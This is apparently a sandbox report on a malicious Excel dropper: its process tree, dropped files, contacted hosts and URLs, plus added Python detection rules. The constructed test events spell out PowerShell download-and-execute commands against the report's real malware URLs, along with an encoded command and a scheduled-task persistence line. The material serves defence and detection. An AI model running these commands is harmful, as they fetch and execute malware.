Source: Yara match File source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE
Behavior Graph

Behavior Graph ID: 336545
Sample: spetsifikatsiya.xls
Start date: 06/01/2021
Architecture: WINDOWS
Score: 100

Signatures on the sample node: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; Sigma detected: Scheduled temp file as task from temp location; 17 other signatures.

Process tree recovered from the graph (child processes are indented under the parent that started them; dropped files, network contacts and signatures are listed with the process they belong to; port lists are reproduced as the graph gives them):

EXCEL.EXE
    Signatures: Obfuscated command line found; Document exploit detected (process start blacklist hit)
    cmd.exe
        powershell.exe
            cmd.exe
                Signatures: Obfuscated command line found
                cmd.exe
                    Signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
                    powershell.exe
                        Network: gtp.bg 195.191.149.103 (49170, 49175, 49191; SUPERHOSTING_ASBG, Bulgaria)
                        Dropped: C:\Users\user\AppData\Roaming\sp.exe (PE32)
                        sp.exe
                            Dropped: C:\Users\user\AppData\Local\...\tmpCF32.tmp (XML); C:\Users\user\AppData\...\gUuYfpYBjYgU.exe (PE32)
                            Signatures: Injects a PE file into a foreign processes; Contains functionality to hide a thread from the debugger
                            sp.exe
                                Network: yz.videomarket.eu 185.157.162.81 (1972, 1973, 49171; OBE-EUROPEObenetworkEuropeSE, Sweden); gtp.bg
                                Dropped: C:\Users\user\...\eyBLwzbrUF1mwXoy.exe (PE32); C:\Users\user\...\ars4t7gFPGrepVgh.exe (PE32); C:\Users\user\...\5DVxvgK9jn5gaBl[1].exe (PE32, listed twice)
                                Signatures: Hides threads from debuggers
                                eyBLwzbrUF1mwXoy.exe
                                    Dropped: C:\Users\user\AppData\Roaming\JrekdQ.exe (PE32)
                                    Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                                    schtasks.exe
                                ars4t7gFPGrepVgh.exe
                                    Signatures: Machine Learning detection for dropped file; Injects a PE file into a foreign processes
                            schtasks.exe
                            sp.exe
                cmd.exe
                mode.com
    cmd.exe
        Signatures: Obfuscated command line found
        powershell.exe
            Network: cutt.ly 172.67.8.238 (443, 49167; CLOUDFLARENETUS, United States); 37.46.150.139 (49169, 80; IWAYCH, Moldova Republic of)
            Dropped: C:\Users\user\Documents\pd.bat (ASCII)
    cmd.exe
        powershell.exe
            Signatures: Powershell drops PE file
    2 other processes
        powershell.exe
            attrib.exe
        powershell.exe
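The chain the behavior graph shows (EXCEL.EXE spawning cmd.exe and powershell.exe, a PowerShell download dropping pd.bat and then sp.exe, and sp.exe registering a scheduled task right after writing an XML file under AppData\Local) is visible in plain process-creation telemetry, without any of this sample's hashes. The block below is an added example, not part of the Joe Sandbox report and not the Sigma rules it references: it runs a handful of rules over constructed process-creation events modelled on Sysmon Event ID 1 fields (ParentImage, Image, CommandLine). The URLs and drop paths are taken from this page, but the command lines, the Office install path, the task name and the temp-file name are assumptions, since the report does not publish the real command lines.

```python
"""Process-creation rules for the execution chain in the behavior graph.

Added example, not from the report. The events below are constructed to
mirror EXCEL.EXE -> cmd.exe -> powershell.exe (download cradle) -> sp.exe ->
schtasks.exe; command lines and the Office path are assumptions.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "powershell_ise.exe", "wscript.exe",
          "cscript.exe", "mshta.exe", "rundll32.exe"}

# Download cradles typical of one-line PowerShell droppers.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b"
    r"|Net\.WebClient|Start-BitsTransfer", re.I)
# -e / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_ARG = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
# User-writable temp locations, the idea behind "scheduled temp file as task".
TEMP_PATH = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\", re.I)
SCHTASKS_CREATE = re.compile(r"/(?:create|xml)\b", re.I)


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> List[str]:
    """Return the names of every rule the event matches (empty if benign)."""
    hits: List[str] = []
    parent, image, cmd = basename(ev.parent_image), basename(ev.image), ev.command_line
    if parent in OFFICE_APPS and image in SHELLS:
        hits.append("office_spawns_shell")
    if image in SHELLS and DOWNLOAD_CRADLE.search(cmd):
        hits.append("download_cradle_in_cmdline")
    if image == "powershell.exe" and ENCODED_ARG.search(cmd):
        hits.append("powershell_encoded_command")
    if image == "schtasks.exe" and SCHTASKS_CREATE.search(cmd):
        if TEMP_PATH.search(cmd):
            hits.append("schtasks_from_temp")
        parent_dir = ev.parent_image.lower()
        if TEMP_PATH.search(parent_dir) or "\\appdata\\roaming\\" in parent_dir:
            hits.append("schtasks_parent_in_user_writable_dir")
    return hits


def scan(events) -> List[Tuple[int, List[str]]]:
    """(index, hits) for every event that matched at least one rule."""
    return [(i, classify(ev)) for i, ev in enumerate(events) if classify(ev)]


# Constructed events. Paths and URLs come from the report; command lines,
# the Office directory, the task name and tmpA1B2.tmp are assumptions.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
              r"C:\Windows\System32\cmd.exe",
              r"cmd /c powershell -w hidden -c (New-Object Net.WebClient).DownloadFile("
              r"'http://37.46.150.139/bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.bat',"
              r"'C:\Users\user\Documents\pd.bat');& 'C:\Users\user\Documents\pd.bat'"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -w hidden -c (New-Object Net.WebClient).DownloadFile("
              r"'http://gtp.bg/opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe',"
              r"'C:\Users\user\AppData\Roaming\sp.exe');Start-Process 'C:\Users\user\AppData\Roaming\sp.exe'"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),  # placeholder blob
    ProcEvent(r"C:\Users\user\AppData\Roaming\sp.exe",
              r"C:\Windows\System32\schtasks.exe",
              r'schtasks /Create /TN "Updates\Example" /XML C:\Users\user\AppData\Local\Temp\tmpA1B2.tmp /F'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              r"notepad.exe C:\Users\user\Documents\notes.txt"),            # benign
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
              r'schtasks /Query /TN "Updates\Example"'),                    # benign admin use
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{idx}] {basename(ev.parent_image)} -> {basename(ev.image)}: {', '.join(hits)}")
```

The parent-process rule is the one that survives renaming: the Excel process, the drop paths and the download hosts all change between campaigns, but an Office binary starting cmd.exe, and a binary under AppData\Roaming starting schtasks.exe with an XML task definition in a temp directory, do not. The two benign events are there to show the rules stay quiet on ordinary schtasks /Query and notepad use.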

Contacted Public IPs

IP               Domain   Country              ASN     ASN Name                      Malicious
172.67.8.238     unknown  United States        13335   CLOUDFLARENETUS               true
208.95.112.1     unknown  United States        53334   TUT-ASUS                      false
195.191.149.103  unknown  Bulgaria             201200  SUPERHOSTING_ASBG             true
185.157.162.81   unknown  Sweden               197595  OBE-EUROPEObenetworkEuropeSE  true
37.46.150.139    unknown  Moldova Republic of  8758    IWAYCH                        false

Contacted Domains

Name               IP               Active
cutt.ly            172.67.8.238     true
yz.videomarket.eu  185.157.162.81   true
gtp.bg             195.191.149.103  true
ip-api.com         208.95.112.1     true

Contacted URLs

http://37.46.150.139/bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.bat
    Malicious: false
    Antivirus detection: 4% (Virustotal); Avira URL Cloud: safe
    Reputation: unknown

http://gtp.bg/opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe
    Malicious: false
    Antivirus detection: Avira URL Cloud: safe
    Reputation: unknown

http://ip-api.com/json/
    Malicious: false
    Antivirus detection: none listed
    Reputation: high

http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe
    Malicious: true
    Antivirus detection: Avira URL Cloud: safe
    Reputation: unknown

The "Malicious: false" verdicts on the 37.46.150.139 and gtp.bg download URLs reflect the URL-reputation lookups, not the observed behavior: the behavior graph shows powershell.exe contacting 37.46.150.139 and dropping C:\Users\user\Documents\pd.bat, and contacting gtp.bg and dropping C:\Users\user\AppData\Roaming\sp.exe. Treat all three download URLs as indicators regardless of the column value; ip-api.com is a public geolocation service contacted to learn the victim's external IP, so its reputation is high while the request itself is still worth alerting on from an unusual parent process.